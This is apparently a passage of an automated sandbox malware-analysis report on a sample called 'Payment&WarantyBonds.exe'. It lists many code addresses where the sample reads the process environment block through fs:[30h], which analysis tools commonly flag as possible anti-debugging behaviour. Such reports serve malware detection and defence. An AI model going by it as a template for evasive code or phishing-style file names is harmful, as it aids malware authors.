                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D0274 mov eax, dword ptr fs:[00000030h]2_2_014D0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D0274 mov eax, dword ptr fs:[00000030h]2_2_014D0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D0274 mov eax, dword ptr fs:[00000030h]2_2_014D0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01457208 mov eax, dword ptr fs:[00000030h]2_2_01457208
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01457208 mov eax, dword ptr fs:[00000030h]2_2_01457208
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F5227 mov eax, dword ptr fs:[00000030h]2_2_014F5227
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141823B mov eax, dword ptr fs:[00000030h]2_2_0141823B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142A2C3 mov eax, dword ptr fs:[00000030h]2_2_0142A2C3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142A2C3 mov eax, dword ptr fs:[00000030h]2_2_0142A2C3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142A2C3 mov eax, dword ptr fs:[00000030h]2_2_0142A2C3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142A2C3 mov eax, dword ptr fs:[00000030h]2_2_0142A2C3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142A2C3 mov eax, dword ptr fs:[00000030h]2_2_0142A2C3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144B2C0 mov eax, dword ptr fs:[00000030h]2_2_0144B2C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144B2C0 mov eax, dword ptr fs:[00000030h]2_2_0144B2C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144B2C0 mov eax, dword ptr fs:[00000030h]2_2_0144B2C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144B2C0 mov eax, dword ptr fs:[00000030h]2_2_0144B2C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144B2C0 mov eax, dword ptr fs:[00000030h]2_2_0144B2C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144B2C0 mov eax, dword ptr fs:[00000030h]2_2_0144B2C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144B2C0 mov eax, dword ptr fs:[00000030h]2_2_0144B2C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014292C5 mov eax, dword ptr fs:[00000030h]2_2_014292C5
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014292C5 mov eax, dword ptr fs:[00000030h]2_2_014292C5
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141B2D3 mov eax, dword ptr fs:[00000030h]2_2_0141B2D3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141B2D3 mov eax, dword ptr fs:[00000030h]2_2_0141B2D3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141B2D3 mov eax, dword ptr fs:[00000030h]2_2_0141B2D3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144F2D0 mov eax, dword ptr fs:[00000030h]2_2_0144F2D0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144F2D0 mov eax, dword ptr fs:[00000030h]2_2_0144F2D0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h]2_2_014D12ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h]2_2_014D12ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h]2_2_014D12ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h]2_2_014D12ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h]2_2_014D12ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h]2_2_014D12ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h]2_2_014D12ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h]2_2_014D12ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h]2_2_014D12ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h]2_2_014D12ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h]2_2_014D12ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h]2_2_014D12ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h]2_2_014D12ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h]2_2_014D12ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014302E1 mov eax, dword ptr fs:[00000030h]2_2_014302E1
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014302E1 mov eax, dword ptr fs:[00000030h]2_2_014302E1
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014302E1 mov eax, dword ptr fs:[00000030h]2_2_014302E1
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F52E2 mov eax, dword ptr fs:[00000030h]2_2_014F52E2
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014DF2F8 mov eax, dword ptr fs:[00000030h]2_2_014DF2F8
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014192FF mov eax, dword ptr fs:[00000030h]2_2_014192FF
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145E284 mov eax, dword ptr fs:[00000030h]2_2_0145E284
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145E284 mov eax, dword ptr fs:[00000030h]2_2_0145E284
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A0283 mov eax, dword ptr fs:[00000030h]2_2_014A0283
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A0283 mov eax, dword ptr fs:[00000030h]2_2_014A0283
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A0283 mov eax, dword ptr fs:[00000030h]2_2_014A0283
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F5283 mov eax, dword ptr fs:[00000030h]2_2_014F5283
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145329E mov eax, dword ptr fs:[00000030h]2_2_0145329E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145329E mov eax, dword ptr fs:[00000030h]2_2_0145329E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014302A0 mov eax, dword ptr fs:[00000030h]2_2_014302A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014302A0 mov eax, dword ptr fs:[00000030h]2_2_014302A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014352A0 mov eax, dword ptr fs:[00000030h]2_2_014352A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014352A0 mov eax, dword ptr fs:[00000030h]2_2_014352A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014352A0 mov eax, dword ptr fs:[00000030h]2_2_014352A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014352A0 mov eax, dword ptr fs:[00000030h]2_2_014352A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014E92A6 mov eax, dword ptr fs:[00000030h]2_2_014E92A6
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014E92A6 mov eax, dword ptr fs:[00000030h]2_2_014E92A6
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014E92A6 mov eax, dword ptr fs:[00000030h]2_2_014E92A6
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014E92A6 mov eax, dword ptr fs:[00000030h]2_2_014E92A6
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014B72A0 mov eax, dword ptr fs:[00000030h]2_2_014B72A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014B72A0 mov eax, dword ptr fs:[00000030h]2_2_014B72A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014B62A0 mov eax, dword ptr fs:[00000030h]2_2_014B62A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014B62A0 mov ecx, dword ptr fs:[00000030h]2_2_014B62A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014B62A0 mov eax, dword ptr fs:[00000030h]2_2_014B62A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014B62A0 mov eax, dword ptr fs:[00000030h]2_2_014B62A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014B62A0 mov eax, dword ptr fs:[00000030h]2_2_014B62A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014B62A0 mov eax, dword ptr fs:[00000030h]2_2_014B62A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A92BC mov eax, dword ptr fs:[00000030h]2_2_014A92BC
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A92BC mov eax, dword ptr fs:[00000030h]2_2_014A92BC
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A92BC mov ecx, dword ptr fs:[00000030h]2_2_014A92BC
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A92BC mov ecx, dword ptr fs:[00000030h]2_2_014A92BC
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01428550 mov eax, dword ptr fs:[00000030h]2_2_01428550
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01428550 mov eax, dword ptr fs:[00000030h]2_2_01428550
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141B562 mov eax, dword ptr fs:[00000030h]2_2_0141B562
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145656A mov eax, dword ptr fs:[00000030h]2_2_0145656A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145656A mov eax, dword ptr fs:[00000030h]2_2_0145656A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145656A mov eax, dword ptr fs:[00000030h]2_2_0145656A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145B570 mov eax, dword ptr fs:[00000030h]2_2_0145B570
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145B570 mov eax, dword ptr fs:[00000030h]2_2_0145B570
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01457505 mov eax, dword ptr fs:[00000030h]2_2_01457505
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01457505 mov ecx, dword ptr fs:[00000030h]2_2_01457505
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F4500 mov eax, dword ptr fs:[00000030h]2_2_014F4500
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F4500 mov eax, dword ptr fs:[00000030h]2_2_014F4500
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F4500 mov eax, dword ptr fs:[00000030h]2_2_014F4500
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F4500 mov eax, dword ptr fs:[00000030h]2_2_014F4500
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F4500 mov eax, dword ptr fs:[00000030h]2_2_014F4500
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F4500 mov eax, dword ptr fs:[00000030h]2_2_014F4500
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F4500 mov eax, dword ptr fs:[00000030h]2_2_014F4500
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014DB52F mov eax, dword ptr fs:[00000030h]2_2_014DB52F
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014CF525 mov eax, dword ptr fs:[00000030h]2_2_014CF525
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014CF525 mov eax, dword ptr fs:[00000030h]2_2_014CF525
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014CF525 mov eax, dword ptr fs:[00000030h]2_2_014CF525
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014CF525 mov eax, dword ptr fs:[00000030h]2_2_014CF525
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014CF525 mov eax, dword ptr fs:[00000030h]2_2_014CF525
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014CF525 mov eax, dword ptr fs:[00000030h]2_2_014CF525
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014CF525 mov eax, dword ptr fs:[00000030h]2_2_014CF525
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145D530 mov eax, dword ptr fs:[00000030h]2_2_0145D530
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145D530 mov eax, dword ptr fs:[00000030h]2_2_0145D530
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01430535 mov eax, dword ptr fs:[00000030h]2_2_01430535
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01430535 mov eax, dword ptr fs:[00000030h]2_2_01430535
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01430535 mov eax, dword ptr fs:[00000030h]2_2_01430535
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01430535 mov eax, dword ptr fs:[00000030h]2_2_01430535
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01430535 mov eax, dword ptr fs:[00000030h]2_2_01430535
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01430535 mov eax, dword ptr fs:[00000030h]2_2_01430535
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142D534 mov eax, dword ptr fs:[00000030h]2_2_0142D534
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142D534 mov eax, dword ptr fs:[00000030h]2_2_0142D534
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142D534 mov eax, dword ptr fs:[00000030h]2_2_0142D534
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142D534 mov eax, dword ptr fs:[00000030h]2_2_0142D534
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142D534 mov eax, dword ptr fs:[00000030h]2_2_0142D534
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142D534 mov eax, dword ptr fs:[00000030h]2_2_0142D534
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F5537 mov eax, dword ptr fs:[00000030h]2_2_014F5537
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144E53E mov eax, dword ptr fs:[00000030h]2_2_0144E53E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144E53E mov eax, dword ptr fs:[00000030h]2_2_0144E53E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144E53E mov eax, dword ptr fs:[00000030h]2_2_0144E53E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144E53E mov eax, dword ptr fs:[00000030h]2_2_0144E53E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144E53E mov eax, dword ptr fs:[00000030h]2_2_0144E53E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014555C0 mov eax, dword ptr fs:[00000030h]2_2_014555C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F55C9 mov eax, dword ptr fs:[00000030h]2_2_014F55C9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145E5CF mov eax, dword ptr fs:[00000030h]2_2_0145E5CF
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145E5CF mov eax, dword ptr fs:[00000030h]2_2_0145E5CF
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014265D0 mov eax, dword ptr fs:[00000030h]2_2_014265D0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145A5D0 mov eax, dword ptr fs:[00000030h]2_2_0145A5D0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145A5D0 mov eax, dword ptr fs:[00000030h]2_2_0145A5D0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F35D7 mov eax, dword ptr fs:[00000030h]2_2_014F35D7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F35D7 mov eax, dword ptr fs:[00000030h]2_2_014F35D7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F35D7 mov eax, dword ptr fs:[00000030h]2_2_014F35D7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0149D5D0 mov eax, dword ptr fs:[00000030h]2_2_0149D5D0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0149D5D0 mov ecx, dword ptr fs:[00000030h]2_2_0149D5D0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014495DA mov eax, dword ptr fs:[00000030h]2_2_014495DA
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014225E0 mov eax, dword ptr fs:[00000030h]2_2_014225E0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144E5E7 mov eax, dword ptr fs:[00000030h]2_2_0144E5E7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144E5E7 mov eax, dword ptr fs:[00000030h]2_2_0144E5E7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144E5E7 mov eax, dword ptr fs:[00000030h]2_2_0144E5E7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144E5E7 mov eax, dword ptr fs:[00000030h]2_2_0144E5E7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144E5E7 mov eax, dword ptr fs:[00000030h]2_2_0144E5E7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144E5E7 mov eax, dword ptr fs:[00000030h]2_2_0144E5E7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144E5E7 mov eax, dword ptr fs:[00000030h]2_2_0144E5E7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144E5E7 mov eax, dword ptr fs:[00000030h]2_2_0144E5E7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145C5ED mov eax, dword ptr fs:[00000030h]2_2_0145C5ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145C5ED mov eax, dword ptr fs:[00000030h]2_2_0145C5ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014415F4 mov eax, dword ptr fs:[00000030h]2_2_014415F4
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014415F4 mov eax, dword ptr fs:[00000030h]2_2_014415F4
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014415F4 mov eax, dword ptr fs:[00000030h]2_2_014415F4
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014415F4 mov eax, dword ptr fs:[00000030h]2_2_014415F4
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014415F4 mov eax, dword ptr fs:[00000030h]2_2_014415F4
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014415F4 mov eax, dword ptr fs:[00000030h]2_2_014415F4
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01422582 mov eax, dword ptr fs:[00000030h]2_2_01422582
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01422582 mov ecx, dword ptr fs:[00000030h]2_2_01422582
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01454588 mov eax, dword ptr fs:[00000030h]2_2_01454588
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141758F mov eax, dword ptr fs:[00000030h]2_2_0141758F
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141758F mov eax, dword ptr fs:[00000030h]2_2_0141758F
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141758F mov eax, dword ptr fs:[00000030h]2_2_0141758F
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145E59C mov eax, dword ptr fs:[00000030h]2_2_0145E59C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014AB594 mov eax, dword ptr fs:[00000030h]2_2_014AB594
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014AB594 mov eax, dword ptr fs:[00000030h]2_2_014AB594
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A05A7 mov eax, dword ptr fs:[00000030h]2_2_014A05A7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A05A7 mov eax, dword ptr fs:[00000030h]2_2_014A05A7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A05A7 mov eax, dword ptr fs:[00000030h]2_2_014A05A7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014415A9 mov eax, dword ptr fs:[00000030h]2_2_014415A9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014415A9 mov eax, dword ptr fs:[00000030h]2_2_014415A9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014415A9 mov eax, dword ptr fs:[00000030h]2_2_014415A9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014415A9 mov eax, dword ptr fs:[00000030h]2_2_014415A9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014415A9 mov eax, dword ptr fs:[00000030h]2_2_014415A9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014B35BA mov eax, dword ptr fs:[00000030h]2_2_014B35BA
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014B35BA mov eax, dword ptr fs:[00000030h]2_2_014B35BA
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014B35BA mov eax, dword ptr fs:[00000030h]2_2_014B35BA
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014B35BA mov eax, dword ptr fs:[00000030h]2_2_014B35BA
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014DF5BE mov eax, dword ptr fs:[00000030h]2_2_014DF5BE
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144F5B0 mov eax, dword ptr fs:[00000030h]2_2_0144F5B0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144F5B0 mov eax, dword ptr fs:[00000030h]2_2_0144F5B0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144F5B0 mov eax, dword ptr fs:[00000030h]2_2_0144F5B0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144F5B0 mov eax, dword ptr fs:[00000030h]2_2_0144F5B0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144F5B0 mov eax, dword ptr fs:[00000030h]2_2_0144F5B0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144F5B0 mov eax, dword ptr fs:[00000030h]2_2_0144F5B0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144F5B0 mov eax, dword ptr fs:[00000030h]2_2_0144F5B0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144F5B0 mov eax, dword ptr fs:[00000030h]2_2_0144F5B0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144F5B0 mov eax, dword ptr fs:[00000030h]2_2_0144F5B0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014445B1 mov eax, dword ptr fs:[00000030h]2_2_014445B1
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014445B1 mov eax, dword ptr fs:[00000030h]2_2_014445B1
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142B440 mov eax, dword ptr fs:[00000030h]2_2_0142B440
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142B440 mov eax, dword ptr fs:[00000030h]2_2_0142B440
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142B440 mov eax, dword ptr fs:[00000030h]2_2_0142B440
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142B440 mov eax, dword ptr fs:[00000030h]2_2_0142B440
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142B440 mov eax, dword ptr fs:[00000030h]2_2_0142B440
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142B440 mov eax, dword ptr fs:[00000030h]2_2_0142B440
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145E443 mov eax, dword ptr fs:[00000030h]2_2_0145E443
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145E443 mov eax, dword ptr fs:[00000030h]2_2_0145E443
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145E443 mov eax, dword ptr fs:[00000030h]2_2_0145E443
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145E443 mov eax, dword ptr fs:[00000030h]2_2_0145E443
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145E443 mov eax, dword ptr fs:[00000030h]2_2_0145E443
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145E443 mov eax, dword ptr fs:[00000030h]2_2_0145E443
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145E443 mov eax, dword ptr fs:[00000030h]2_2_0145E443
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145E443 mov eax, dword ptr fs:[00000030h]2_2_0145E443
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141645D mov eax, dword ptr fs:[00000030h]2_2_0141645D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014DF453 mov eax, dword ptr fs:[00000030h]2_2_014DF453
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144245A mov eax, dword ptr fs:[00000030h]2_2_0144245A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01421460 mov eax, dword ptr fs:[00000030h]2_2_01421460
